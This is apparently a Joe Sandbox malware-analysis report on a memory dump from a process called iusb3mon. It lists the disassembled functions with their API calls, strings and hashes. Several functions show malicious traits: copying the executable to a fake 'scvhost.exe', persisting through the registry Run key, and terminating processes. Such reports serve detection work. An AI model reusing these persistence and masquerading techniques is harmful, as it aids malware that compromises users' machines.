Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleLibraryLoadPointerSizeWrite_rand
String ID: KERNEL32.dll
API String ID: 2551126021-254546324
Opcode ID: 68f14ac69b84f51b57c86064565434c34025753ec886462e061030567322bc92
Instruction ID: ca68ee890b7c2b1255db325ad0d145c7b40ba59afc9abdf9a50380d97d7f9885
Opcode Fuzzy Hash: 68f14ac69b84f51b57c86064565434c34025753ec886462e061030567322bc92
Instruction Fuzzy Hash: 7621E2B1D00209FFDF149F68D888ABE7B7AEB84380F108169FF55A6180C6740E46DF64

Function 06298EF1 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,?,?,?,?,?,?,?,?,00000000,Function_0000ADE0,062AE518,000000FF,?,06298D0F), ref: 06298F19
GetProcAddress.KERNEL32(?,OpenInputDesktop), ref: 06298F74
GetProcAddress.KERNEL32(?,OpenDesktopA), ref: 06298F81
GetProcAddress.KERNEL32(?,CloseDesktop), ref: 06298F8D

Strings

CloseDesktop, xrefs: 06298F85
OpenInputDesktop, xrefs: 06298F67, 06298F6A
user32.dll, xrefs: 06298F14
OpenDesktopA, xrefs: 06298F79

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
API String ID: 2238633743-3711086354
Opcode ID: a367f9a70f28b2ff2a4a4b75f85db525bca8c0ab3d2d69b9692594bdb61940ae
Instruction ID: f4322c1ae025e6c7f8870c7319fc9db4e79533c438923345e3ed02ad4d7e5480
Opcode Fuzzy Hash: a367f9a70f28b2ff2a4a4b75f85db525bca8c0ab3d2d69b9692594bdb61940ae
Instruction Fuzzy Hash: 50318D70C08389EEEF11DBA8D8887DDBFB5AF16758F180169E94476291C7BA0904CB71

Function 06292A59 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61filestringCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?), ref: 06292A71
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 06292AC4
GetFileSize.KERNEL32(00000000,00000000), ref: 06292AD1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 06292AE3
lstrlenA.KERNEL32(06292DCE,?,00000000), ref: 06292AF1
WriteFile.KERNEL32(00000000,06292DCE,00000000), ref: 06292AFC
CloseHandle.KERNEL32(00000000), ref: 06292B03

Strings

.dat, xrefs: 06292A9F

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateFolderHandlePathPointerSizeSpecialWritelstrlen
String ID: .dat
API String ID: 2901490279-100240174
Opcode ID: 3bbb1141790d6190a95f9f4232215638e7180969f94690105ca05a558ab65acb
Instruction ID: feaaae9673c0df2f64b508fc1a39cfe66f1f3b031d6c20cfdb783b4abf58b751
Opcode Fuzzy Hash: 3bbb1141790d6190a95f9f4232215638e7180969f94690105ca05a558ab65acb
Instruction Fuzzy Hash: 32119E71551229BBDBA0AEA0AC4DFDF3F2DEB85750F004051FA85A1040DAB48A86AFB1

Function 062A2698 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,062A0AB7,?,Microsoft Visual C++ Runtime Library,00012010,?,062AEAEC,?,062AEB3C,?,?,?,Runtime Error!Program: ), ref: 062A26AA
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 062A26C2
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 062A26D3
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 062A26E0

Strings

user32.dll, xrefs: 062A26A5
GetActiveWindow, xrefs: 062A26CD
GetLastActivePopup, xrefs: 062A26D5
MessageBoxA, xrefs: 062A26BC

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: e280fd0ce085bfc2db021cd0965a3c6091e8f0a8d3f3dace7b34799282561d70
Instruction ID: 692b8a12c03c20dfa89ed146f1e9e66ea8f8abb06014be1392e4c952d9ea965f
Opcode Fuzzy Hash: e280fd0ce085bfc2db021cd0965a3c6091e8f0a8d3f3dace7b34799282561d70
Instruction Fuzzy Hash: D8017131A21312EF97509FB5ACC8DE67AE9EE88BA0305042AFA41C3111D7B5C505DF60

Function 062AAFEE Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,062AB2E8,?,00020000), ref: 062AAFF7
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 062AB000
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 062AB014
#17.COMCTL32 ref: 062AB02F
#17.COMCTL32 ref: 062AB04B
FreeLibrary.KERNEL32(00000000), ref: 062AB057

Strings

InitCommonControlsEx, xrefs: 062AB00C
COMCTL32.DLL, xrefs: 062AAFF0, 062AAFF6, 062AAFFD

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: 4c571a1bfd0a5535829da42a4fa78c84ea49949c7c78e82ed6ccdf935a5363ae
Instruction ID: b66e92c9049dabc7e217b7b1e50c54d45a6b3c75fa71076974b812e9e4dd8112
Opcode Fuzzy Hash: 4c571a1bfd0a5535829da42a4fa78c84ea49949c7c78e82ed6ccdf935a5363ae
Instruction Fuzzy Hash: 92F02832A203138B97116E74BE8C91A77ADAF807627064525FE90E3100CBE0CC02DB61

Function 062A322A Relevance: 13.7, APIs: 9, Instructions: 221COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,062AE7F0,00000001,062AE7F0,00000001,00000000,063C119C,0629AA00,00000000,?,?,?,0629EA70,?,0000000C), ref: 062A3268
CompareStringA.KERNEL32(00000000,00000000,062C6150,00000001,062C6150,00000001,?,?,?,0629EA70,?,0000000C), ref: 062A3285
CompareStringA.KERNEL32(?,?,00000000,?,0000000C,?,00000000,063C119C,0629AA00,00000000,?,?,?,0629EA70,?,0000000C), ref: 062A32E3
GetCPInfo.KERNEL32(0629EA70,00000000,00000000,063C119C,0629AA00,00000000,?,?,?,0629EA70,?,0000000C), ref: 062A3334
MultiByteToWideChar.KERNEL32(0629EA70,00000009,00000000,?,00000000,00000000,?,?,?,0629EA70,?,0000000C), ref: 062A33B3
MultiByteToWideChar.KERNEL32(0629EA70,00000001,00000000,?,?,?,?,?,?,0629EA70,?,0000000C), ref: 062A3414
MultiByteToWideChar.KERNEL32(0629EA70,00000009,0000000C,?,00000000,00000000,?,?,?,0629EA70,?,0000000C), ref: 062A3427
MultiByteToWideChar.KERNEL32(0629EA70,00000001,0000000C,?,?,00000000,?,?,?,0629EA70,?,0000000C), ref: 062A3473
CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,0629EA70,?,0000000C), ref: 062A348B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: 7f24011cac6fe7f67137cc21be4ec2425a61833c981d6c4f596b563463f4a564
Instruction ID: c74c7f5c54eec4eede085133e84fb8967a5d6ebe7abf72cbf4e6f9e91d889778
Opcode Fuzzy Hash: 7f24011cac6fe7f67137cc21be4ec2425a61833c981d6c4f596b563463f4a564
Instruction Fuzzy Hash: 6F716C31D2434AAFDFA1CF949C499EE7BBAFB05310F14412AFD91E6250C7B28851DBA1

Function 0629E461 Relevance: 13.7, APIs: 9, Instructions: 177COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,062AE7F0,00000001,00000000,00000000,7622E860,062C893C,?,00000003,00000000,00000001,00000000,?,?,062A3769), ref: 0629E4A3
LCMapStringA.KERNEL32(00000000,00000100,062C6150,00000001,00000000,00000000,?,?,062A3769,?), ref: 0629E4BF
LCMapStringA.KERNEL32(?,?,00000000,00000001,00000000,00000003,7622E860,062C893C,?,00000003,00000000,00000001,00000000,?,?,062A3769), ref: 0629E508
MultiByteToWideChar.KERNEL32(?,062C893D,00000000,00000001,00000000,00000000,7622E860,062C893C,?,00000003,00000000,00000001,00000000,?,?,062A3769), ref: 0629E540
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,?,00000000), ref: 0629E598
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 0629E5AE
LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 0629E5E1
LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 0629E649

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 21a32b7d9da6641ff9a4546c8bfd5b84eeed4b94aa4fb55a1dd270360e239bf6
Instruction ID: eb0c6288a9168800a14df1f4d687c475db1dbeda7e32ad1facc42bea90de7fc4
Opcode Fuzzy Hash: 21a32b7d9da6641ff9a4546c8bfd5b84eeed4b94aa4fb55a1dd270360e239bf6
Instruction Fuzzy Hash: 1E516C3192020AAFCF629F94DC89AAE7FB5FF88750F11411AFE90A1150E7728961DF71

Function 062980C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?,?,?,?,06297EA3), ref: 062980EA
GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 062980F9
LoadLibraryA.KERNEL32(?,?,?,?,06297EA3), ref: 06298130
GetProcAddress.KERNEL32(?,7459C083), ref: 062981A7
FreeLibrary.KERNEL32(?,06297EA3), ref: 062981E9

Strings

kernel32.dll, xrefs: 062980D5
IsBadReadPtr, xrefs: 062980F0

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressLoadProc$Free
String ID: IsBadReadPtr$kernel32.dll
API String ID: 1413238409-2271619998
Opcode ID: d29e409894c6b3bc6f2d54e5ea0038679ccbd68c20319ea8c2e52e7263205349
Instruction ID: 6296c806162f5afde88815328b53a0a3ca87760dfac4141b988ec421cdf422f1
Opcode Fuzzy Hash: d29e409894c6b3bc6f2d54e5ea0038679ccbd68c20319ea8c2e52e7263205349
Instruction Fuzzy Hash: A3417E71E10206EFEF90CF64D8447AABBB4EF82354F198469DD65E7240D778D940CBA0

Function 062A0993 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,06298D56), ref: 062A0A00
GetStdHandle.KERNEL32(000000F4,062AEAEC,00000000,00000000,00000000,06298D56), ref: 062A0AD6
WriteFile.KERNEL32(00000000), ref: 062A0ADD

Strings

<program name unknown>, xrefs: 062A0A10
Microsoft Visual C++ Runtime Library, xrefs: 062A0AAC
Runtime Error!Program: , xrefs: 062A0A66
..., xrefs: 062A0A52

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: b9591e1309c35bc5c33b414b4345cc4799e7982589a3eeacaf054bbd3efccd4d
Instruction ID: 2cf5f47e1ab2dcfc8f4bab4d65f8a3c4d2813852ea41484338d6afea2cd09d00
Opcode Fuzzy Hash: b9591e1309c35bc5c33b414b4345cc4799e7982589a3eeacaf054bbd3efccd4d
Instruction Fuzzy Hash: AC313672E203196FEFA09A60CD49FEA736DEF81300F140456FE95D6041E6F0D981DE22

Function 06294574 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63registryfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000000,?,?), ref: 062945A6
CopyFileA.KERNEL32(00000000,?,00000000), ref: 062945D3
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?), ref: 062945ED
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000104,?,?), ref: 06294608
RegCloseKey.ADVAPI32(?,?,?), ref: 06294611

Strings

C:\Program Files\Common Files\scvhost.exe, xrefs: 062945AE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 062945E3

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCopyModuleNameOpenValue
String ID: C:\Program Files\Common Files\scvhost.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
API String ID: 3295893203-1226825942
Opcode ID: f62c634200e09a449927735115f99f162e9399094335fee5571aea3a7a2332ed
Instruction ID: 2426414d5e540efd2953294877f16761a95a797aa4cc64378654da702e370f1b
Opcode Fuzzy Hash: f62c634200e09a449927735115f99f162e9399094335fee5571aea3a7a2332ed
Instruction Fuzzy Hash: 6B115E72A0031CBBEF118AA0ED49FDB7B6DEB44340F000061FB05B6080DAB15A49DB60

Function 0629884F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 47libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06298854
LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06298873
GetProcAddress.KERNEL32(00000000,closesocket), ref: 06298881
DeleteCriticalSection.KERNEL32(?), ref: 062988B2
FreeLibrary.KERNEL32(00000000), ref: 062988BD

Strings

ws2_32.dll, xrefs: 0629886E
closesocket, xrefs: 0629887B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressCriticalDeleteFreeH_prologLoadProcSection
String ID: closesocket$ws2_32.dll
API String ID: 3065476401-181964208
Opcode ID: ab92769e3d13ce1007780bcc0593c1ad95cfa92668d976a37cc35bfdbc634627
Instruction ID: 323c65e5235365164f53ed6cc7f93da811034277ebd49b56c5da07360b509976
Opcode Fuzzy Hash: ab92769e3d13ce1007780bcc0593c1ad95cfa92668d976a37cc35bfdbc634627
Instruction Fuzzy Hash: 8701D671E103069FDB549FA4D84D6AEB7F8FF44361F110A2AED62A3180D7B49901CB70

Function 06293D76 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 36fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,00000104,062BCC34), ref: 06293D93
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 06293DA1
GetTickCount.KERNEL32 ref: 06293DA7
wsprintfA.USER32 ref: 06293DC1
MoveFileA.KERNEL32(?,?), ref: 06293DD8
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 06293DE9

Strings

%s\%d.bak, xrefs: 06293DBB

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
String ID: %s\%d.bak
API String ID: 830686190-2116986511
Opcode ID: 7c6ce93f215652428cbb7ce5e65612b81523eeb5dcbf90ae046a33e20b01d32f
Instruction ID: 64087a5111cdbecb6e6beaa94e7af9c79d87d98558482a7f80038b929cdbec6f
Opcode Fuzzy Hash: 7c6ce93f215652428cbb7ce5e65612b81523eeb5dcbf90ae046a33e20b01d32f
Instruction Fuzzy Hash: E7F0A4B7800328ABDB10DBA4ED8DFC7777DEB14311F004591B759D2051DA749684CFA0

Function 062A0828 Relevance: 12.1, APIs: 8, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0629B640), ref: 062A0843
GetEnvironmentStrings.KERNEL32(?,?,?,?,0629B640), ref: 062A0857
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0629B640), ref: 062A0883
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0629B640), ref: 062A08BB
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,0629B640), ref: 062A08DD
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0629B640), ref: 062A08F6
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0629B640), ref: 062A0909
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 062A0947

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: 9ef3e930ee3731b0d7d83f89193043f90d8f8a954d18bf63056cfe62521ed7a0
Instruction ID: 4001ec8adaeedc8bf3d138ddb1f58d8f796884adb4af8381637150f5698b2a80
Opcode Fuzzy Hash: 9ef3e930ee3731b0d7d83f89193043f90d8f8a954d18bf63056cfe62521ed7a0
Instruction Fuzzy Hash: C931F672D343275FEBA03F756C8883FB69DEA4979C7054539FE92C3100E6E09C458AA1

Function 06293441 Relevance: 12.1, APIs: 8, Instructions: 94processCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06293446
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0629345C
Process32First.KERNEL32(00000000,?), ref: 06293475
Process32Next.KERNEL32(00000000,00000128), ref: 06293497
Process32Next.KERNEL32(00000000,00000128), ref: 062934EF
OpenProcess.KERNEL32(00000001,00000000,?,?,00000000,00000128,00000000,?,00000002,00000000), ref: 062934FF
TerminateProcess.KERNEL32(00000000,00000000), ref: 06293509
CloseHandle.KERNEL32(00000000), ref: 06293510

Part of subcall function 062A84B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062A84C5

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$NextProcess$CloseCreateDecrementFirstH_prologHandleInterlockedOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 87439402-0
Opcode ID: 1b05a7402a6d0b9b991cd5507674063ac12d45249e4aacd98f16faf29ca7417e
Instruction ID: b60750fcc92b0f3b566547c44677f978a895164691469b2ee9606e1e45211d26
Opcode Fuzzy Hash: 1b05a7402a6d0b9b991cd5507674063ac12d45249e4aacd98f16faf29ca7417e
Instruction Fuzzy Hash: 11316C7182031AAFDB85FFA0DC949FE7B78FF49750F100159ED26A6190DBB88B45CA60

Function 062AB68A Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 062AB6AA
lstrcmpA.KERNEL32(?,?), ref: 062AB6B6
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 062AB6C8
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 062AB6EB
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 062AB6F3
GlobalLock.KERNEL32(00000000), ref: 062AB700
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 062AB70D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 062AB72B

Part of subcall function 062AB94C: GlobalFlags.KERNEL32(?), ref: 062AB956
Part of subcall function 062AB94C: GlobalUnlock.KERNEL32(?), ref: 062AB96D
Part of subcall function 062AB94C: GlobalFree.KERNEL32(?), ref: 062AB978

Memory Dump Source

